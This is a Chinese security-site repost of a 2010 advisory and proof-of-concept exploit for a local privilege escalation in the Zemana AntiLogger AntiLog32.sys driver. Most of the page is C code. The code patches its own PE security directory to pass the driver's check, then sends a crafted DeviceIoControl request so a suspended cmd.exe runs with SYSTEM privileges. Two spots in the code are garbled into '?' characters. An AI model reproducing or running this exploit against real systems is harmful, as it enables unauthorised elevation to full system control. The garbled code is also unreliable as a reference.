Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation

来源：th_decoder@126.com 作者：MJ0011 发布时间：2010-07-30

Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
 
VULNERABLE PRODUCTS
Zemana AntiLogger <=1.9.2.2.206
 
DETAILS:
AntiLog32.sys create a device called \Device\AntiLog32 , and handles DeviceIoControl request IoControlCode = 0x8000201C , which  can elevate the privilege of a process to another process
 
EXPLOIT CODE:
 
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)
 
typedef struct _IMPERSONATE_PROCESS{
    HANDLE ImpersonateProcess ;
    HANDLE SystemProcess ;
}IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;
 
int main(int argc, char* argv[])
{
    printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n"
        "Local Privilege Escalation Vulnerability Proof-of-Concept\n"
        "2010-7-28\n"
        "By MJ0011 th_decoder@126.com\n\nPress Enter\n");
    getchar();
     
    //bypass some useless create check
 
    PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);
    PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;
     
    ULONG oldp ;
 
    VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);
    pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ;
    VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);
 
 
    HANDLE hdev = CreateFile("\\\\.\\AntiLog32" ,
        FILE_READ_ATTRIBUTES ,
        FILE_SHARE_READ ,
        0,
        OPEN_EXISTING ,
        0,0);
 
    if (hdev == INVALID_HANDLE_VALUE)
    {
        printf("cannot open device %u\n" , GetLastError());
        getchar();
        return 0;
 
    }
 
    STARTUPINFOA sia ;
    memset(&sia , 0 , sizeof(sia));
    sia.cb = sizeof(sia);
    PROCESS_INFORMATION pi ;
    memset(? , 0 , sizeof(pi));
 
     
 
    if (!CreateProcess("c:\\windows\\system32\\cmd.exe" ,
        NULL ,
        NULL,
        NULL,
        FALSE ,
        CREATE_SUSPENDED,
        NULL,
        NULL,
        &sia ,
        ?))
    {
        printf("cannot run cmd.exe....%u\n", GetLastError());
        getchar();
        return 0 ;
    }
 
     
    IMPERSONATE_PROCESS ip ;
    ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ;
    ip.SystemProcess = (HANDLE)4 ; //// WinXP and later
    ULONG btr ;
 
    if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))
    {
        printf("cannot impersonate process %u\n" , GetLastError());
        getchar();
        return 0 ;
    }
 
    ResumeThread(pi.hThread);
 
    printf("OK\n");
 
     
    return 0;
}
 
================================

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告